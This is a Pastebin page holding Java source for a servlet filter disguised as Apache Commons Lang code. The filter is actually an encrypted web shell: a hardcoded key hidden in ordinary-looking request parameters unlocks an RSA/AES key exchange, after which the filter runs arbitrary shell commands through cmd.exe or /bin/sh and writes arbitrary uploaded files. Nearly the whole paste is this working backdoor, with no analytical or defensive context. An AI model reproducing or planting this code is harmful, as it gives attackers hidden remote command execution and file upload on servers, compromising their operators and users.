Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- package org.apache.commons.lang;
- import java.io.DataInputStream;
- import java.io.FileOutputStream;
- import java.io.IOException;
- import java.io.InputStream;
- import java.io.OutputStream;
- import java.security.KeyFactory;
- import java.security.PublicKey;
- import java.security.spec.X509EncodedKeySpec;
- import java.util.Objects;
- import javax.crypto.Cipher;
- import javax.crypto.KeyGenerator;
- import javax.crypto.SecretKey;
- import javax.crypto.spec.SecretKeySpec;
- import javax.servlet.Filter;
- import javax.servlet.FilterChain;
- import javax.servlet.FilterConfig;
- import javax.servlet.ServletException;
- import javax.servlet.ServletRequest;
- import javax.servlet.ServletResponse;
- import javax.servlet.http.HttpServletRequest;
- import javax.servlet.http.HttpServletResponse;
- import javax.servlet.http.HttpSession;
- public class ServletContextAttributeYminqFilter implements Filter {
- public String _accessKey = "Cmalbadtas";
- public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
- HttpServletRequest request = (HttpServletRequest)servletRequest;
- HttpServletResponse response = (HttpServletResponse)servletResponse;
- try {
- HttpSession session = request.getSession();
- if (session.getAttribute("sessionKey") != null && !session.getAttribute("sessionKey").equals("")) {
- byte[] sessionKey = this.doBase64Decode((String)session.getAttribute("sessionKey"));
- SecretKeySpec secretKeySpec = new SecretKeySpec(sessionKey, "AES");
- if (Objects.equals(request.getParameter("role"), "guest")) {
- this.runCommand(request, response, secretKeySpec);
- } else if (Objects.equals(request.getParameter("role"), "user")) {
- this.upload(request, response, secretKeySpec);
- }
- } else {
- String receivedKey = request.getParameter("pageId");
- String accessKey = request.getParameter("userID");
- if (accessKey.equals(this._accessKey) && receivedKey != null) {
- KeyGenerator keyGen = null;
- keyGen = KeyGenerator.getInstance("AES");
- keyGen.init(256);
- SecretKey secretKey = keyGen.generateKey();
- String secretKeyBase64 = this.doBase64Encode(secretKey.getEncoded());
- session.setAttribute("sessionKey", secretKeyBase64);
- byte[] byteKey = this.doBase64Decode(receivedKey);
- X509EncodedKeySpec X509publicKey = new X509EncodedKeySpec(byteKey);
- KeyFactory keyFactory = null;
- keyFactory = KeyFactory.getInstance("RSA");
- PublicKey publicKey = keyFactory.generatePublic(X509publicKey);
- Cipher encryptionCipher = Cipher.getInstance("RSA");
- encryptionCipher.init(1, publicKey);
- byte[] encryptedMessage = encryptionCipher.doFinal(secretKeyBase64.getBytes());
- String encryption = this.doBase64Encode(encryptedMessage);
- OutputStream out = response.getOutputStream();
- out.write(encryption.getBytes());
- out.flush();
- out.close();
- } else {
- filterChain.doFilter(request, response);
- }
- }
- } catch (Exception var20) {
- filterChain.doFilter(request, response);
- }
- }
- public void runCommand(HttpServletRequest request, HttpServletResponse response, SecretKeySpec secretKeySpec) throws Exception {
- Cipher instance = Cipher.getInstance("AES");
- String cmd = "";
- instance.init(2, secretKeySpec);
- cmd = new String(instance.doFinal(this.doBase64Decode(request.getParameter("pageID"))));
- boolean isWindows = System.getProperty("os.name").toLowerCase().contains("windows");
- Process p;
- if (isWindows) {
- p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/C", cmd});
- } else {
- p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
- }
- InputStream inputStream = p.getInputStream();
- DataInputStream dis = new DataInputStream(inputStream);
- String disr = dis.readLine();
- OutputStream out = response.getOutputStream();
- instance.init(1, secretKeySpec);
- while(disr != null) {
- out.write(this.doBase64Encode(instance.doFinal(disr.getBytes())).getBytes());
- disr = dis.readLine();
- out.flush();
- }
- out.close();
- }
- public void upload(HttpServletRequest request, HttpServletResponse response, SecretKeySpec secretKeySpec) throws Exception {
- Cipher instance = Cipher.getInstance("AES");
- instance.init(2, secretKeySpec);
- byte[] data = this.doBase64Decode(new String(instance.doFinal(this.doBase64Decode(request.getParameter("userID")))));
- String fileName = new String(instance.doFinal(this.doBase64Decode(request.getParameter("pageID"))));
- FileOutputStream fos = new FileOutputStream(fileName);
- fos.write(data);
- fos.flush();
- fos.close();
- }
- public byte[] doBase64Decode(String str) throws Exception {
- try {
- Class clazz = Class.forName("sun.misc.BASE64Decoder");
- return (byte[])clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
- } catch (Exception var5) {
- Class clazz = Class.forName("java.util.Base64");
- Object decoder = clazz.getMethod("getDecoder").invoke((Object)null);
- return (byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
- }
- }
- public String doBase64Encode(byte[] data) throws Exception {
- try {
- Class<?> clazz = Class.forName("sun.misc.BASE64Encoder");
- return (String)clazz.getMethod("encode", byte[].class).invoke(clazz.newInstance(), data);
- } catch (Exception var5) {
- Class<?> clazz = Class.forName("java.util.Base64");
- Object encoder = clazz.getMethod("getEncoder").invoke((Object)null);
- return (String)encoder.getClass().getMethod("encodeToString", byte[].class).invoke(encoder, data);
- }
- }
- public void init(FilterConfig filterConfig) throws ServletException {
- }
- public void destroy() {
- }
- }
Add Comment
Please, Sign In to add comment
